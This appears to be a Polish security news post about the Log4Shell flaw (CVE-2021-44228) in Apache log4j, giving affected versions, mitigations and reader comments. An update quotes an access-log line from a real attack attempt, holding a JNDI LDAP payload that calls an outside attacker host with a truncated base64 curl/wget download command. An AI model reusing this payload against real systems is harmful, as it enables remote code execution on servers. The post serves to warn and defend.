Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Krytyczna podatność w log4j (CVE-2021-44228) – łatajcie, bo zaczęło się masowe exploitowanie
Uwaga – rozbudowany wpis o podatności log4j mamy dostępny tutaj.
Szczegóły podatności dostępne są tutaj, a wg relacji podatne są również (oczywiście) biblioteki czy rozwiązania wykorzystujące Apache log4j (mowa jest m.in. o Steam, iCloud czy serwerach Minecraft). Prawdopodobnie podatne są też rozwiązania wykorzystujące bibliotekę Struts.
Podatne wersje log4j: 2.0 <= Apache log4j <= 2.14.1
Exploit jest bardzo prosty i wymaga aby po stronie serwerowej logowane było coś, co atakujący prześle w dowolny sposób do aplikacji (np. jako wartość dowolnej zmiennej GET czy POST). Wykorzystanie podatności daje możliwość wykonania wrogiego kodu po stronie serwerowej.Dobra wiadomość: prawdopodobnie nie są podatne systemy używające JDK w wersjach wyższych niż: 6u211, 7u201, 8u191, 11.0.1.
Rekomendacje? Wg wstępnych doniesień powinno pomóc:
Start your server with log4j2.formatMsgNoLookups set to true, or update to log4j-2.15.0-rc1 or later.
Podatność została załatana 5 dni temu, trwają aktywne exploitacje.
Aktualizacja 1: dostępna jest już łatka (2.15.0)
Aktualizacja 2. ktoś próbował nawet exploitować sekuraka (nie, nie korzystamy z Javy):
45.155.205.233 - - [10/Dec/2021:13:25:54 +0000] "GET / HTTP/1.1" 200 17191 "http://51.77.40.125:80/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MS43Ny40MC4xMjU6ODB8fHdnZXQgLXEgLU[...]
~Michał Sajdak
45.155.205.233 cisnie skanerem – dzis w pracy widzialem ten IP ma mostku technicznym
u nas ten sam IP
Pytanie czy i w jaki sposób strona WordPress mogłaby być w ten sposób zaatakowana? Nie znam się, ale gdy napisaliście o metodach GET i POST, zacząłem się zastanawiać :)
WP to nie java więc nie ;)
Javowy Spring Boot nie jest podatny o ile używamy domyślnego loggera: https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot